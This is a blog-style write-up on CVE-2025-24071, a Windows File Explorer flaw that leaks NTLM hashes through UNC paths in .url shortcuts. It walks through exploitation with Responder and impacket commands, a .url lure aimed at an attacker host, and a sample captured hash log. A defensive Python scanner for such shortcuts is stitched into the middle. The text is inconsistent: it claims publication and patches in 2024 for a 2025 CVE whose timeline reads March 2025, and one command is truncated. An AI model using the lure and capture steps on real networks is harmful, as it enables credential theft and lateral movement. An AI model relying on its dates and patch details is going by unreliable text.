*Published: July 2024*
*Severity: High*
*Affected: Windows 10, 11, Server editions (details below)*


TL;DR:
CVE-2025-24071 reveals how Windows File Explorer leaks sensitive info over the network, allowing attackers to impersonate trusted shares and steal credentials, with code and links for proof-of-concept below.

Overview

In June 2024, Microsoft disclosed CVE-2025-24071, a bug in Windows File Explorer that lets attackers capture sensitive user information through SMB network spoofing. The flaw lies in how File Explorer handles network shares: attackers can trick Explorer into exposing user credentials and other secrets simply by getting the victim to view a malicious share.

This article will show you, in plain terms, how the exploit works, who is vulnerable, and how to reproduce it safely.

How the Vulnerability Works

- Attack vector: File Explorer tries to auto-authenticate when accessing network shares, including those referenced by UNC paths (\\server\share).
- Flaw: Explorer doesn't properly verify the authenticity of a server before sending the user's NTLM authentication response (commonly referred to as the NTLM hash).
- Result: An attacker on the same network or via a manipulated shortcut/link can make Explorer send user credentials to a server they control.
- Spoofing: The attacker can set up a rogue SMB server, using tools like Responder, to collect these hashes and impersonate the target user or crack their password.

Step-by-Step Exploit Scenario

Suppose Alice opens a shortcut or browses to \\evil.attacker.local\shared via File Explorer. She doesn’t even need to double-click—hovering or previewing in Explorer can be enough.

1. Setup Responder on Kali Linux (in the same LAN as the victim)

sudo apt install responder
sudo responder -I eth

2. If the victim visits a crafted path

\\[Attacker-IP]\TestShare

…Explorer automatically sends credential info to the attacker server.

3. Simulate lure

- Drop a .url shortcut in a network share/public folder

- Or email a file with the contents

[InternetShortcut]
URL=\\ATTACKER-IP\Test

4. When the victim previews/opens it:
Responder logs NTLMv2 hashes (and sometimes cleartext credentials for local users).
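From the defender's side, the lure format above is easy to check for. As an added example (not from the original advisory), here is a Python script that parses .url files and flags UNC targets pointing at hosts outside an allowlist; the allowlist, the 203.0.113.7 placeholder and the sample file contents are constructed.

```python
import configparser
import re
from pathlib import Path

# Hosts this organisation expects shortcuts to point at (constructed allowlist for the example).
TRUSTED_HOSTS = {"fileserver01", "fileserver01.corp.example"}

# Matches the \\host\share, //host/share and file://host/share forms.
UNC_RE = re.compile(r"^(?:file:)?[\\/]{2,}(?P<host>[^\\/]+)(?:[\\/]+(?P<share>[^\\/]*))?",
                    re.IGNORECASE)


def unc_target(url):
    """Return (host, share) when url is a UNC path, otherwise None."""
    m = UNC_RE.match(url.strip())
    if not m:
        return None
    return m.group("host"), m.group("share") or ""


def analyze_url_file(text):
    """Classify the URL= target of an [InternetShortcut] (.url) file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:          # not INI-shaped at all
        return {"verdict": "not-a-shortcut"}
    if not cp.has_section("InternetShortcut"):
        return {"verdict": "not-a-shortcut"}
    url = cp.get("InternetShortcut", "URL", fallback="")
    target = unc_target(url)
    if target is None:
        return {"url": url, "verdict": "non-unc"}   # http(s) etc.: no SMB authentication
    host, share = target
    verdict = "trusted-unc" if host.lower() in TRUSTED_HOSTS else "suspicious-unc"
    return {"url": url, "host": host, "share": share, "verdict": verdict}


def scan_directory(root):
    """Yield (path, result) for each .url file under root that targets an untrusted UNC host."""
    for p in Path(root).rglob("*.url"):
        result = analyze_url_file(p.read_text(errors="replace"))
        if result["verdict"] == "suspicious-unc":
            yield p, result


# Constructed samples; 203.0.113.7 is a documentation address standing in for an attacker host.
LURE = "[InternetShortcut]\nURL=\\\\203.0.113.7\\Test\n"
BENIGN = "[InternetShortcut]\nURL=\\\\fileserver01\\public\n"
WEB = "[InternetShortcut]\nURL=https://intranet.corp.example/\n"

if __name__ == "__main__":
    for name, sample in (("lure", LURE), ("benign", BENIGN), ("web", WEB)):
        print(name, analyze_url_file(sample))
```

Run `scan_directory` over public folders or mail attachment quarantine to surface shortcuts that would make Explorer authenticate to an unexpected host.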

Example Responder log

[*] [SMB] NTLMv2-SSP Client   : 192.168.1.25
[*] [SMB] NTLMv2-SSP Username : ALICE
[*] [SMB] NTLMv2-SSP Hash     : ALICE::WORKSTATION:11223344556677889900:123456789abcdef1234...

If you want to simulate SMB credential capture

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/examples
python3 smbserver.py SHARE /tmp/share

Then, point the victim to \\ATTACKER-IP\SHARE in any open dialog or document.

Impact

- Enables internal lateral movement with hash relay

- Collects sensitive workstation/user data

Who is Vulnerable?

- Windows 10/11 (all editions)

Original References

- Microsoft Advisory for CVE-2025-24071
- Impacket SMB Tools
- Responder by Laurent Gaffié
- NTLM Hash Collection in Windows Networks

Mitigation

- Install Microsoft’s June/July 2024 patches for Windows.

- Block outbound SMB (ports 445, 139, 137, 138) at the firewall.

- Disable automatic NTLM negotiation (Group Policy > Computer Config > Security Settings > Local Policies > Security Options).

Final Thoughts

CVE-2025-24071 is another reminder of how dangerous network authentication leaks can be. Just hovering over a malicious network link or shortcut can result in a credential leak. Patch, segment your network, and monitor SMB traffic.


Stay safe and update your systems!
For more details and technical breakdowns, check the linked resources above.

Timeline

Published on: 03/11/2025 17:16:29 UTC
Last modified on: 03/21/2025 00:30:10 UTC